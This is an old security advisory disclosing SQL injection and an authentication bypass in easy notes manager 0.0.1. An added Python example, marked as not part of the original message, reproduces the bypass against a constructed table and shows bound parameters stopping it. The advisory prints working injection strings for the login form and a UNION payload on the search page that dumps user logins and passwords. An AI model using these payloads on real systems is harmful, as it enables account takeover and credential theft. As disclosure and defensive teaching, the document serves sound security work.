
| Subject: | easy notes manager sql injection and authentication bypass |
|---|---|
| Date: | 29 Oct 2006 04:17:11 -0000 |

easy notes manager (eNM) version 0.0.1, available at http://217.172.179.216/evandor/html/index.php?id=103 is affected by multiple sql injection vulnerabilities due to a missing check of the user supplied input. An attacker can bypass the authentication procedure and get a full dump of the database tables.

No patches are available but a possible solution is to change the TABLEPREFIX variable in the config file to a very random one and suppress all error messages (and eventually downgrade mysql5 to mysql4). The vendor has been warned.

proof of concept to bypass authentication:

username: dontcare' and 0=1 union select id,login,'0cc175b9c0f1b6a831c399e269772661',grp,salutation,firstname,lastname,email from users where login='superadmin

password: a

proof of concept to get a list of all users and passwords: go to search page and search for:

"dontcare')) union select 0,login,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0 from users -- "

cheers

-p
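
The authentication bypass above works when the login query is built by string concatenation and the supplied password is checked against the hash in whatever row comes back. The following is an added example, not eNM's code and not part of the original message: the query shape, the function names and the SQLite table are assumptions made for illustration (the column order follows the advisory's UNION list), and it shows the same username matching nothing once it is bound as a parameter.

```python
import hashlib
import sqlite3

# Username and password taken verbatim from the advisory's proof of concept.
POC_USERNAME = ("dontcare' and 0=1 union select id,login,"
                "'0cc175b9c0f1b6a831c399e269772661',grp,salutation,"
                "firstname,lastname,email from users where login='superadmin")
POC_PASSWORD = "a"  # MD5("a") is the hash embedded in the username above

def make_db():
    """Constructed stand-in for the eNM users table (sample data only)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, login TEXT, password TEXT, "
               "grp TEXT, salutation TEXT, firstname TEXT, lastname TEXT, "
               "email TEXT)")
    stored = hashlib.md5(b"constructed-admin-secret").hexdigest()
    db.execute("INSERT INTO users VALUES (1, 'superadmin', ?, 'admin', 'Mr', "
               "'Super', 'Admin', 'admin@example.invalid')", (stored,))
    return db

def hash_matches(row, password):
    # Assumed check: MD5 of the supplied password against column 3 of the row.
    # MD5 is kept only to mirror the advisory; it is not a sound password hash.
    return row is not None and row[2] == hashlib.md5(password.encode()).hexdigest()

def login_vulnerable(db, username, password):
    # Assumed flaw: the username is pasted into the SQL text, so a quote in it
    # ends the string literal and the rest is parsed as SQL.
    sql = "SELECT * FROM users WHERE login='" + username + "'"
    row = db.execute(sql).fetchone()
    return row[1] if hash_matches(row, password) else None

def login_hardened(db, username, password):
    # Bound parameter: the whole username is compared as one string value.
    row = db.execute("SELECT * FROM users WHERE login = ?", (username,)).fetchone()
    return row[1] if hash_matches(row, password) else None

if __name__ == "__main__":
    db = make_db()
    print("concatenated query:", login_vulnerable(db, POC_USERNAME, POC_PASSWORD))
    print("bound parameter:   ", login_hardened(db, POC_USERNAME, POC_PASSWORD))
    print("real credentials:  ", login_hardened(db, "superadmin", "constructed-admin-secret"))
```

Binding the input removes the injection point itself, so the result no longer depends on the table prefix being unguessable or on error messages being hidden.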